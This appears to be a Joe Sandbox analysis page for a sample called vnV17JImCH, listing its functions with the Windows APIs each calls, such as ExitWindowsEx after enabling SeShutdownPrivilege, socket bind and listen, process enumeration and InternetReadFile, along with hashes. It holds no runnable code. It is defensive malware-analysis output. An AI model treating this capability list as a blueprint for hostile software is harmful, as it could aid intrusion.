Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 1544f6d82705030deca3b0b64f2af1d86cfa4fbdc68daa011d7c8686b6a69a48
Instruction ID: 904937fa93234706232443fa271d5912115fef87e8596ef7eb8fd1f42fd3c47d
Opcode Fuzzy Hash: 1544f6d82705030deca3b0b64f2af1d86cfa4fbdc68daa011d7c8686b6a69a48
Instruction Fuzzy Hash: 6A316D714083859BC305EF24CC919AFB7ECAE9A314F405D2DF4D5A61D2EB21AA0DE763

Function 00F051BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EF882B
Part of subcall function 00EF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EF8858
Part of subcall function 00EF87E1: GetLastError.KERNEL32 ref: 00EF8865

ExitWindowsEx.USER32(?,00000000), ref: 00F051F9

Strings

SeShutdownPrivilege, xrefs: 00F051C9
, xrefs: 00F051E7
@, xrefs: 00F051EC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 0dcd6d7c09f83ef1ea31225f0887b4b58a570fad99bac4e6f49784daf205ae0d
Instruction ID: dd23bf75b86e6cd9968410752f58e917ddef55f876d2e05efebd9f87948985db
Opcode Fuzzy Hash: 0dcd6d7c09f83ef1ea31225f0887b4b58a570fad99bac4e6f49784daf205ae0d
Instruction Fuzzy Hash: 9E01F736AA1615ABE7386268AC8AFBB73A8DF05B50F240571F903E20D2DAD15C05B990

Function 00F16283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F162DC
WSAGetLastError.WSOCK32(00000000), ref: 00F162EB
bind.WSOCK32(00000000,?,00000010), ref: 00F16307
listen.WSOCK32(00000000,00000005), ref: 00F16316
WSAGetLastError.WSOCK32(00000000), ref: 00F16330
closesocket.WSOCK32(00000000,00000000), ref: 00F16344

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 49ed0890fe1380829658ac586aec154437f8ed9863554eb49762b2aeb1b7aa08
Instruction ID: 491ac065bb3d87897f72171a331afbc9b4098c0061daa70034a2a0a22757000f
Opcode Fuzzy Hash: 49ed0890fe1380829658ac586aec154437f8ed9863554eb49762b2aeb1b7aa08
Instruction Fuzzy Hash: BC21A2316002049FCB10EF64C945BAEB7F9EF49720F144269E926E73D2C770AD45EB61

Function 00EB5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00EC0DB6: std::exception::exception.LIBCMT ref: 00EC0DEC
Part of subcall function 00EC0DB6: __CxxThrowException@8.LIBCMT ref: 00EC0E01

_memmove.LIBCMT ref: 00EF0258
_memmove.LIBCMT ref: 00EF036D
_memmove.LIBCMT ref: 00EF0414

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: b28ce7ddd3d47d7f7260309fddabd7d0008fd6adb1e56b88284930d652ebc9e2
Instruction ID: 2286eb4ec9dcd98c69f0ebe7df054eade9bb07215389948da7fba477260d3e7f
Opcode Fuzzy Hash: b28ce7ddd3d47d7f7260309fddabd7d0008fd6adb1e56b88284930d652ebc9e2
Instruction Fuzzy Hash: 6702BFB1A00209DFDF04DF64D981ABEBBF5EF48300F149069E90AEB255EB35E951CB91

Function 00EA1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00EA19FA
GetSysColor.USER32(0000000F), ref: 00EA1A4E
SetBkColor.GDI32(?,00000000), ref: 00EA1A61

Part of subcall function 00EA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00EA12D8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: cdba152501647ead258c55a1cf5da9d45b9546a31b8b5a6fd74b516717af62a8
Instruction ID: e5848bffaf855d99ff3f69d434a818a06c00a7b3c9c49d5a151fe57a643c8aba
Opcode Fuzzy Hash: cdba152501647ead258c55a1cf5da9d45b9546a31b8b5a6fd74b516717af62a8
Instruction Fuzzy Hash: 10A15A70106598FAD628AB285C54DFF359CDF8B349F16215EF502FE292DA14BD02E2B1

Function 00F16747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F17DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F1679E
WSAGetLastError.WSOCK32(00000000), ref: 00F167C7
bind.WSOCK32(00000000,?,00000010), ref: 00F16800
WSAGetLastError.WSOCK32(00000000), ref: 00F1680D
closesocket.WSOCK32(00000000,00000000), ref: 00F16821

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 7419de9ddf8b2f07dab5b88a4d1f2ceeb980985c851cd2237e5d26094c6db8c7
Instruction ID: dbf84ee653b6bfe047fa63508383af4a24d8a1f22f5c8a4a0a42a581463b9268
Opcode Fuzzy Hash: 7419de9ddf8b2f07dab5b88a4d1f2ceeb980985c851cd2237e5d26094c6db8c7
Instruction Fuzzy Hash: 9441A175A00214AFDB14AF648C86F6E77E89F0A724F04856CF915BF3D3CA74AD019791

Function 00F25376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F253C5
IsWindowEnabled.USER32 ref: 00F253D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00F253E0
IsIconic.USER32 ref: 00F253EE
IsZoomed.USER32 ref: 00F253FC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b86be45e57aaa8164f8457a100d4e551e945828929c60a41ee5bfdbfe3909076
Instruction ID: 9cd6a7318c74ac4036951c96031a59d673173e604c271cd3fc93e49a18920b4e
Opcode Fuzzy Hash: b86be45e57aaa8164f8457a100d4e551e945828929c60a41ee5bfdbfe3909076
Instruction Fuzzy Hash: 14112B317005245FDB30AF66EC44B6EBBE9FF49BA0B005038F845D7241CB74EC0296A0

Function 00EF80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EF80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EF80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EF80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EF80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EF80F6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1b2d371558c05519ff92892410e3d097ab35fa7c215f93ccb8ef0f3747c714c2
Instruction ID: bb2831e85eedad68fc2d22263dbc125b47ee1995ae391db6d678898b6d63ca2c
Opcode Fuzzy Hash: 1b2d371558c05519ff92892410e3d097ab35fa7c215f93ccb8ef0f3747c714c2
Instruction Fuzzy Hash: 2EF06231251208AFEB204FA5EC8DE773BBCEF89759B400135FA45D6150CB719C46EA60

Function 00EA4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00EA4AD0), ref: 00EA4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EA4B57

Strings

GetNativeSystemInfo, xrefs: 00EA4B51
kernel32.dll, xrefs: 00EA4B40

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: f701c42b186494a413047cca77bf57544fb6c8211159bf9e63178aae61c17828
Instruction ID: c363f80a7d6328f8e8dcb215a29efb48b41c260f9f583805358f11d71b8c7d1e
Opcode Fuzzy Hash: f701c42b186494a413047cca77bf57544fb6c8211159bf9e63178aae61c17828
Instruction Fuzzy Hash: E1D05B74A20727CFD7309F31EC18B06B6F4AF89755B11C87ED485DA190D7B0E484D665

Function 00F1EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F1EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00F1EE4B

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Process32NextW.KERNEL32(00000000,?), ref: 00F1EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F1EF1A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: d04732e9e512da5d239c1824132c3486cc7425e4639abf050d1810be8c0e6e93
Instruction ID: 8cf80919ef8274bb42953b15056101a9b2c0cb651cd606882bca4b89a96c283b
Opcode Fuzzy Hash: d04732e9e512da5d239c1824132c3486cc7425e4639abf050d1810be8c0e6e93
Instruction Fuzzy Hash: 1A51A4715043059FD310EF20DC81EABB7E8EF99710F50582DF9959B2A1DB70E909CB92

Function 00EAFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: efbd91db11a9e43a949b211a2e03ed38191e4627e8d5b5c14796aabc3fbaef0d
Instruction ID: 89d8f9373556468b9a085f9f0b3959737b48a5ce9dcf339efb7f9425d3504a03
Opcode Fuzzy Hash: efbd91db11a9e43a949b211a2e03ed38191e4627e8d5b5c14796aabc3fbaef0d
Instruction Fuzzy Hash: 9E9259706083418FD724DF14C480BABB7E5BF89304F14996DE89AAB2A2D775FC45CB92

Function 00EFE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EFE628

Strings

(, xrefs: 00EFE66E
|, xrefs: 00EFE658

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: b4e54eb73aea42f88ca59870a03e73fff25275a4aa5f0f41547b8bb38acbc7b5
Instruction ID: 0037309e34048f8cc88a0272075ba247a11b52486e5483a6229c3d4b905b32c7
Opcode Fuzzy Hash: b4e54eb73aea42f88ca59870a03e73fff25275a4aa5f0f41547b8bb38acbc7b5
Instruction Fuzzy Hash: BA322575A007099FD728DF19C4819AAB7F1FF48310B15D46EE99AEB3A1E770E941CB40

Function 00F122EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F1180A,00000000), ref: 00F123E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F12418

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: e5b966fe24b60acbcdaacebc9072fc9ec8cfcb1ca99dc0082de6e3218cd83185
Instruction ID: e69af372efd6ef4ce8b4d0872fcf8f573daeb8d09aa8d89fbbbadba47e70193e
Opcode Fuzzy Hash: e5b966fe24b60acbcdaacebc9072fc9ec8cfcb1ca99dc0082de6e3218cd83185
Instruction Fuzzy Hash: 2041B172904209BFEB60DBD5DC85FFBB7BCEB40324F10402AF615A6141EA759E91A660

Function 00F0B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F0B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F0B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F0B4B2

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c979c09216f7c5962eefc4f8b0bd09566e536ca96b1b877a1c3d65dd58f0a388
Instruction ID: 6b1f59a4d4c332342ec9515f1697bab75a08de10f959f4ac5431a5102d3f7bd2
Opcode Fuzzy Hash: c979c09216f7c5962eefc4f8b0bd09566e536ca96b1b877a1c3d65dd58f0a388
Instruction Fuzzy Hash: 09216235A00108DFCB00DF95D881AEDBBF8FF49310F1480A9E905AB351CB35A915DB50

Function 00EF87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00EC0DB6: std::exception::exception.LIBCMT ref: 00EC0DEC
Part of subcall function 00EC0DB6: __CxxThrowException@8.LIBCMT ref: 00EC0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EF882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EF8858
GetLastError.KERNEL32 ref: 00EF8865

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 262edb64cdb40e37b5868ba8e05472709c3d9cacfd4e9eadddd56bb82bb305d8
Instruction ID: 998062e5fcdb38649bf409812ebdee3183895661c87be9aa0bb7f1566e69f3d2
Opcode Fuzzy Hash: 262edb64cdb40e37b5868ba8e05472709c3d9cacfd4e9eadddd56bb82bb305d8
Instruction Fuzzy Hash: 71118FB2814208AFE728DFA4DD85D7BB7FCEB44750B60952EF456A7241EB31BC418B60

Function 00EF874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EF8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EF878B
FreeSid.ADVAPI32(?), ref: 00EF879B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6a4742a5f30a682ea380a1aa1eb25d50a7f2e11cd4a84e7214c73e63a3571394
Instruction ID: 4ffdc157e0ab55b9287c6a69f4acd283aca7b6e0f8becac6cc4a79ee87357d8f
Opcode Fuzzy Hash: 6a4742a5f30a682ea380a1aa1eb25d50a7f2e11cd4a84e7214c73e63a3571394
Instruction Fuzzy Hash: A6F03775A1120CBBDB00DFE49D89AAEBBB8EF08301F1044A9AA01E2181E6716A089B50

Function 00F04C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F04CB3

Strings

DOWN, xrefs: 00F04C98

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: ca877843969aafc2e6dd72dac399840a8cdf73bf833a0e8f5ef895d738345772
Instruction ID: 4bf5b8e109f7cb62da3baf5c2c6d6a57424b2a1fa7f7b573fb618a7c7b520b65
Opcode Fuzzy Hash: ca877843969aafc2e6dd72dac399840a8cdf73bf833a0e8f5ef895d738345772
Instruction Fuzzy Hash: 6BE046A61A97213CF9042919BD07EB7138C8B1233AB10425AFE10E54C1EE857C8634BA

Function 00F0C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F0C6FB
FindClose.KERNEL32(00000000), ref: 00F0C72B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 31f2289318f722fbd29bea82ba080f0d7a7778d1d8c557b9f46616c2c817c087
